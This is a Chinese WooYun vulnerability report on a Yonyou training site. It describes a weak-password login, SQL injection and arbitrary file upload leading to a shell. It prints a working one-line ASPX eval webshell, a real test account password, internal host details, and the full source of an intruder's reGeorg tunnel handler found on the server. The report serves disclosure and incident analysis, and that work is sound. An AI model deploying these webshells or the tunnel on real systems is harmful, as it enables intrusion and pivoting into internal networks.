当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0207265

漏洞标题:从一个弱口令到Getshell用友某站点(可深入内网&已发现入侵者痕迹)

相关厂商:用友软件

漏洞作者: 路人甲

提交时间:2016-05-11 09:35

修复时间:2016-06-26 13:30

公开时间:2016-06-26 13:30

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-11: 细节已通知厂商并且等待厂商处理中
2016-05-12: 厂商已经确认,细节仅向厂商公开
2016-05-22: 细节向核心白帽子及相关领域专家公开
2016-06-01: 细节向普通白帽子公开
2016-06-11: 细节向实习白帽子公开
2016-06-26: 细节向公众公开

简要描述:

从一个弱口令到getshell用友某站点(已发现入侵者痕迹)

详细说明:

1.某站点未设置验证码:
简单测试后拿到一个账号:
http://lexue.yonyou.com
test1/123456

2.png


2.发现某处SQL注入
登录后对站点进行简单测试,发现存在一处报错注入:

3.png


不深入测试,估计还存在注入,请自查!

漏洞证明:

3.个人资料头像处存在文件任意上传

4.png


经过测试后发现,上传正常的菜刀马会出现错误报错,无法正常解析aspx。

<head runat="server" />
<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["1"],"unsafe"));%>


上传后,通过抓包可得到完整上传路径:

5.png


发现该服务器与内网相通:

[*] 基本信息 [ A:C:D:L: ]
D:\PX20150204\Website\Upload\PXSystem\default\> whoami
nt authority\network service
D:\PX20150204\Website\UpLoad\PXSystem\default\> nslookup yonyou.com
鏈嶅姟鍣?  bg-dc-01.ufsoft.com.cn
Address:  192.168.8.119
鍚嶇О:    yonyou.com.com.cn
Address:  202.106.199.34


4.发现入侵痕迹:
同目录下发现文件:20151002173504600358.aspx

<%@ Page Language="Jscript"%><%eval(Request.Item["g"],"unsafe");%><head runat="server">f</head>


可确定入侵时间点为:去年10月2号。
发现提权神器:

6.png


通过查找目录,发现
D:\PX20150204\Website\Upload\Log\tunnel.ashx

<%@ WebHandler Language="C#" Class="GenericHandler1" %>
using System;
using System.Web;
using System.Net;
using System.Net.Sockets;
public class GenericHandler1 : IHttpHandler, System.Web.SessionState.IRequiresSessionState
{
    
    public void ProcessRequest (HttpContext context) {
        try
        {
            if (context.Request.HttpMethod == "POST")
            {
                String cmd = context.Request.QueryString.Get("cmd").ToUpper();
                if (cmd == "CONNECT")
                {
                    try
                    {
                        String target = context.Request.QueryString.Get("target").ToUpper();
                        int port = int.Parse(context.Request.QueryString.Get("port"));
                        IPAddress ip = IPAddress.Parse(target);
                        System.Net.IPEndPoint remoteEP = new IPEndPoint(ip, port);
                        Socket sender = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                        
                        sender.Connect(remoteEP);
                        sender.Blocking = false;                    
                        context.Session["socket"] = sender;
                        context.Response.AddHeader("X-STATUS", "OK");
                    }
                    catch (Exception ex)
                    {
                        context.Response.AddHeader("X-ERROR", ex.Message);
                        context.Response.AddHeader("X-STATUS", "FAIL");
                    }
                }
                else if (cmd == "DISCONNECT")
                {
                    try
                    {
                        Socket s = (Socket)context.Session["socket"];
                        s.Close();
                    }
                    catch (Exception ex)
                    {
                    }
                    context.Session.Abandon();
                    context.Response.AddHeader("X-STATUS", "OK");
                }
                else if (cmd == "FORWARD")
                {
                    Socket s = (Socket)context.Session["socket"];
                    try
                    {
                        int buffLen = context.Request.ContentLength;
                        byte[] buff = new byte[buffLen];
                        int c = 0;
                        while ((c = context.Request.InputStream.Read(buff, 0, buff.Length)) > 0)
                        {
                            s.Send(buff);
                        }
                        context.Response.AddHeader("X-STATUS", "OK");
                    }
                    catch (Exception ex)
                    {
                        context.Response.AddHeader("X-ERROR", ex.Message);
                        context.Response.AddHeader("X-STATUS", "FAIL");
                    }
                }
                else if (cmd == "READ")
                {
                    Socket s = (Socket)context.Session["socket"];
                    try
                    {
                        int c = 0;
                        byte[] readBuff = new byte[512];
                        try
                        {
                            while ((c = s.Receive(readBuff)) > 0)
                            {
                                byte[] newBuff = new byte[c];
                                Array.ConstrainedCopy(readBuff, 0, newBuff, 0, c);
                                context.Response.BinaryWrite(newBuff);
                            }
                            context.Response.AddHeader("X-STATUS", "OK");
                        }
                        catch (SocketException soex)
                        {
                            context.Response.AddHeader("X-STATUS", "OK");
                            return;
                        }
                    }
                    catch (Exception ex)
                    {
                        context.Response.AddHeader("X-ERROR", ex.Message);
                        context.Response.AddHeader("X-STATUS", "FAIL");
                    }
                }
            } else {
                context.Response.Write("Georg says, 'All seems fine'");
            }
        }
        catch (Exception exKak)
        {
            context.Response.AddHeader("X-ERROR", exKak.Message);
            context.Response.AddHeader("X-STATUS", "FAIL");
        }
    }
 
    public bool IsReusable {
        get {
            return false;
        }
    }
}


根据时间点分析:该文件创建于去年10月27日,可能该入侵者,上传文件并隐藏于log目录下,进行内网反弹,可深入进行内网渗透。
由于未得到厂商允许,未进行深入渗透!

修复方案:

请自查!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-05-12 13:20

厂商回复:

非常感谢

最新状态:

暂无